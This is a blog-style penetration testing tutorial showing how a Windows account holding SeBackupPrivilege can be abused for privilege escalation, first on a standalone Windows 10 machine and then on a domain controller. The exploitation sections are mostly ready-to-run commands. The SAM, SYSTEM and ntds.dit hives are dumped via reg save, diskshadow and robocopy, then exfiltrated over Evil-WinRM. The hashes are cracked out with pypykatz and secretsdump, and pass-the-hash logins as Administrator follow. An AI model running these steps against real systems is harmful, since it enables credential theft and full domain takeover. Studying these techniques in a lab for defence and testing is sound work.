In this article, we will shed light on some of the methods of Escalating Privilege on Windows-based Devices when it is vulnerable with the SeBackupPrivilege after getting the initial foothold on the device.
Table of Content
·
Introduction
·
Setting Up Privilege on
Windows 10
·
Testing Privilege on Windows
10
·
Exploiting Privilege on
Windows 10
·
Setting Up Privilege on Domain
Controller
·
Testing Privilege on Domain
Controller
·
Exploiting Privilege on Domain
Controller (Method 1)
·
Exploiting Privilege on Domain
Controller (Method 2)
·
Conclusion
Introduction
This specific privilege escalation is based
on the act of assigning a user SeBackupPrivilege. It was designed for allowing
users to create backup copies of the system. Since it is not possible to make a
backup of something that you cannot read. This privilege comes at the cost of
providing the user with full read access to the file system. This privilege
must bypass any ACL that the Administrator has placed in the network. So, in a
nutshell, this privilege allows the user to read any file on the entirety of
the files that might also include some sensitive files such as the SAM file or
SYSTEM Registry file. From the attacker's perspective, this can be exploited
after gaining the initial foothold in the system and then moving up to an
elevated shell by essentially reading the SAM files and possibly crack the
passwords of the high privilege users on the system or network. This article
will help you set up the privilege in a VM environment to learn and explore it
in detail and then exploit it via Kali Linux.
Setting Up Privilege on Windows 10
We will be performing this demonstration on
a Windows 10 machine that is quite essential not part of a domain. Here, we
need to create a user to which we will be providing the privilege. Creating a user
is simple, it can be done using a new user command as shown in the image below.
net user aarti 123 /add
The user creating can be verified by just
running the net user command without any options. Now, to create a realistic
scenario, we need to enable the WinRM. Since we are going to attack this
machine through the Kali Linux and when trying to exploit a Windows Machine
that is an access that we preferably end up with, we are going to active it.
This can be done by opening PowerShell and Enabling the PSRemoting option.
Although it is required to set the permissions to run scripts to bypass as
demonstrated below.
powershell -ep bypass
Enable-PSRemoting -Force
Till now, we have created a user and then
enabled WinRM on the Target machine. Now for the most important step. We need
to provide the privilege to the newly created user. We will be using a Module
Named Carbon. Firstly, we need to install the module and then import its
objects into the session using the Import-Module option. Learn More about Carbon.
Install-Module -Name carbon
Import-Module carbon
There are a bunch of different cmdlets that
come with the caron module that we just installed. One of the cmdlets is called
Grant-CPrivilege. This cmdlet will be used to give the SeBackupPrivilege to the
aarti user that we just created. To
provide the privilege, we need to provide the username of the user we need the
privilege enabled. This will be done by defining the parameter Identity then
followed by that we need to define the Privilege parameter with
SeBackupPrivilege as shown in the image below. It can be checked if the
privilege was applied to the user by using another cmdlet called
Test-CPrivilege which we tested as it came out to be true.
Grant-CPrivilege -Identity aarti
-Privilege SeBackupPrivilege
Test-CPrivilege -Identity aarti
-Privilege SeBackupPrivilege
This concludes the setting up process. Now
time to test and exploit this privilege using Evil-WinRM.
Testing Privilege on Windows 10
After setting up, it’s time to move to the
Kali Linux machine and connect to the target machine through the Evil-WinRM.
This process is pretty simple can be done by typing evil-winrm in the terminal
and then defining parameters -i with the target IP Address, -u with the target username
-p with the password corresponding to that particular user.
After connecting to the target machine
using Evil-WinRM, we can check if the user we logged in has the SeBackupPrivilege.
This can be done with the help of the whoami command with the /priv option. It
can be observed from the image below that the user aarti has the SeBackupPrivilege.
evil-winrm -i 192.168.1.41 -u aarti –p
“123”
whoami /priv
Exploiting Privilege on Windows 10
Now, we can start the exploitation of this
privilege. As we discussed earlier that this privilege allows the user to read
all the files in the system, we will use this to our advantage. To begin, we
will traverse to the C:\ directory and then move to create a Temp directory. We
can also traverse to a directory with the read and write privilege if the
attacker is trying to be sneaky. Then we change the directory to Temp. Here we
use our SeBackupPrivilege to read the SAM file and save a variant of it. Similarly,
we read the SYSTEM file and save a variant of it.
cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
This means that now our Temp Directory must
have a SAM file and a SYSTEM file. Now using the Evil-WinRM download command,
we transfer the file from the Temp directory on the target machine to our Kali
Linux Machine.
cd Temp
download sam
download system
Now, we can extract the hive secrets from
the SAM and SYSTEM file using the pypykatz. If not present on your Kali Linux,
you can download it from its GitHub. It is a variant
of Mimikatz cooked in Python. So, we can run its registry function and then use
the --sam parameter to provide the path to the SAM and SYSTEM files. As soon as
the command run, we can see in the demonstration below that we have
successfully extracted the NTLM hashes of the Administrator account and other
users as well.
pypykatz registry --sam sam system
Now, we can use the NTLM Hash of the raj
user to get access to the target machine as a raj user. We again used
Evil-WinRM to do this. After connecting to the target machine, we run net user
to see that raj user is a part of the Administrator group. This means we have
successfully elevated privilege over our initial shell as the aarti user.
evil-winrm -i 192.168.1.41 -u raj -H
“##Hash##”
net user raj
You can also use the Administrator NTLM
hash and log in directly by Evil-WinRM. This is demonstrated below.
evil-winrm -i 192.168.1.41 -u
administrator -H “##Hash##”
Setting Up Privilege on Domain Controller
To set up the SeBackupPrivilege on a Domain Controller is slightly different than doing so on Windows 10. To begin with, we need to create a new user that we will apply the privilege. This can be done from the Server Manager Window on a Domain Controller. In the Tools Menu, you can find Active Directory Users and Computers. Now, Right-click on the domain and choose the New option from the drop-down menu. It will create another menu, choose User from that menu as depicted in the screenshot below.
This will open a new window New Object-User
to define the user parameters. We name the user as ignite with the User logon
name as ignite@ignite.local. Click on the Next button, you will be prompted to
create a password for this user.
After creating a password for the ignite
user, you will notice that there is a new entry in the middle of Active
Directory Users and Computers by the name of “ignite” corresponding to the user
we just created as shown in the image below. Right-click on the ignite user and
choose to Add to a group from the drop-down menu.
This will open a new window to Select the
Group for the ignite user. We make the ignite user a part of the Backup
Operators Group. After adding the name of the group, click on the OK button and
now we are done setting up the SeBackupPrivilege on the Domain Controller for
ignite user.
Testing Privilege on Domain Controller
To test if the ignite user has the
SeBackupPrivilege, we connect to the target machine using the Evil-WinRM. After connecting, we use the whoami /priv
command as before to check the privileges of the ignite user. We can observe
from the image below that indeed the user ignite has the SeBackupPrivilege and
SeRestorePrivilege enabled.
evil-winrm -i 192.168.1.172 -u ignite –p
“Password@1”
whoami /priv
Before moving on to Exploitation, let us
explain why there is a difference in the methodology of exploitation between a
Domain Controller and a Windows Machine. This is because, in the case of a DC,
the privilege only allows you to make backups not copies. In a standalone
system, we can make copies of the files that we discussed in the first portion
of our article. In the case of DC, the method differs as now we need to make
backups of the SAM and SYSTEM files or any other sensitive files to extract the
password hash of users. There are two methods to make this kind of backup.
Exploiting Privilege on Domain Controller (Method 1).
Now that we have a grasp of the process
that we are about to perform, let’s move ahead. Unlike the standalone
exploitation, in the Domain Controller, we need the ntds.dit file to extract
the hashes along with the system hive. The problem with the ntds.dit file is
that while the Target Machine is running the file always remains in the usage
and as we are pretty aware of the fact that when a file is an underuse then it
is not possible to copy the file using any conventional methods. To circumvent
this problem, we need to use diskshadow functionality. This is a built-in
function of Windows that can help us create a copy of a drive that is currently
in use. There are methods to use the diskshadow which include providing
instructions in a diskshadow shell but that tends to be a bit tricky. Hence, we
will be creating a Distributed Shell File or a dsh file which will consist of
all the commands that are required by the diskshadow to run and create a full
copy of our Windows Drive which we then can use to extract the ntds.dit file
from. We move to our Kali Linux shell and create a dsh file using the editor of
your preference. In this file, we are instructing the diskshadow to create a
copy of the C: Drive into a Z Drive with raj as its alias. The Drive Alias and
Character can be anything you want. After creating this dsh file, we need to
use the unix2dos to convert the encoding and spacing of the dsh file to the one
that is compatible with the Windows Machine.
nano raj.dsh
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:
unix2dos raj.dsh
Back to the WinRM Session, we move to the
Temp Directory and upload the raj.dsh file to the target machine. Then, we use
the diskshadow with dsh script as shown in the image below. If observed, it can
be noticed that diskshadow is indeed executing the same commands that we
entered in the dsh file sequentially. After running, as discussed, it will
create a copy of the C drive into Z drive. Now, we can use the RoboCopy tool to
copy the file from the Z Drive to the Temp Directory.
cd C:\Temp
upload raj.dsh
diskshadow /s raj.dsh
robocopy /b z:\windows\ntds . ntds.dit
We are now in the possession of the
ntds.dit file and we need to extract the system hive. This can be done with a
simple reg save command as demonstrated in the image below. With now both
ntds.dit file and system hive file in the Temp directory, we now use the
download command to transfer both of these files to our Kali Linux.
reg save hklm\system c:\Temp\system
cd C:\Temp
download ntds.dit
download system
On our Kali Linux shell, we can use the
secretsdump script that is a part of the Impacket Framework to extract our
hashes from the ntds.dit file and the system hive. It can be observed from the
image below that the hashes for the Administrator account have been
successfully extracted.
impacket-secretsdump -ntds ntds.dit
-system system local
We can now use the Evil-WinRM to log in as
the Administrator account using its hash. This is how we can elevate our
privilege on the Windows Domain Controller.
evil-winrm -i 192.168.1.172 -u
administrator -H “##Hash##”
Exploiting Privilege on Domain Controller (Method 2)
This method requires 2 Dynamic Link Library
(DLL) files that will help us create backups of the ntds.dit and system files. These
DLL files can be downloaded from this GitHub. We
will be needing the SeBackupPrivilegeUtils.dll and SeBackupPrivilegeCmdLets.dll
files on our Kali Linux. We will use the Evil-WinRM session that we already
have to transfer the DLL files and the DSH file that we created in the previous
method to the Target Machine.
cd C:\Temp
upload raj.dsh
upload SeBackupPrivilegeUtils.dll
upload SeBackupPrivilegeCmdLets.dll
Now, as these are the DLL files, to use
them, we need to Import them into Memory. This can be done using the
Import-Module cmdlet. Now as we did in the previous method, we need to use
diskshadow with the raj.dsh file to create a backup of the C Drive [Windows
Installation Drive] on the Target System.
Import-Module
.\SeBackupPrivilegeUtils.dll
Import-Module
.\SeBackupPrivilegeCmdLets.dll
diskshadow /s raj.dsh
Now that we have successfully created a
backup, we can use it to extract the ntds.dit file and the system file. Unlike
the previous method, this time we will be using the Copy-FileSebackupPrivilege
cmdlet to copy the ntds.dit file from the Z volume to the Temp Directory. The
Copy-FileSebackupPrivilege cmdlet is a part of the DLL files that we imported earlier.
We will use the reg save command to copy the system file to the Temp Directory
as well. After ensuring that both the files have successfully copies to the
Temp, we will use the download feature of Evil-WinRM to transfer the files from
the Evil-WinRM shell of the Domain Controller to the Kali Linux.
Copy-FileSebackupPrivilege
z:\Windows\NTDS\ntds.dit C:\Temp\ntds.dit
reg save hklm\system c:\Temp\system
cd C:\Temp
download ntds.dit
download system
After the successful transfer, we will use
the secretsdump script of the Impacket to extract the hashes from the ntds.dit
file and the system file. We can see that it has successfully extracted all the
hashes.
impacket-secretsdump -ntds ntds.dit
-system system local
As before we can use the Administrator
hashes to log in on the Target Machine with Administrative or Elevated Access
as shown in the image below.
evil-winrm -i 192.168.1.172 -u
administrator -H “##Hash##”
Conclusion
The point that we are trying to convey
through this article is that there are multiple methods to consider while elevating
Privileges on Windows-Based devices if your initial foothold has the
SeBackupPrivilege. We wanted this article to serve as your go-to guide whenever
you are trying to elevate privilege on a Windows machine using the
SeBackupPrivilege.
0 comments:
Post a Comment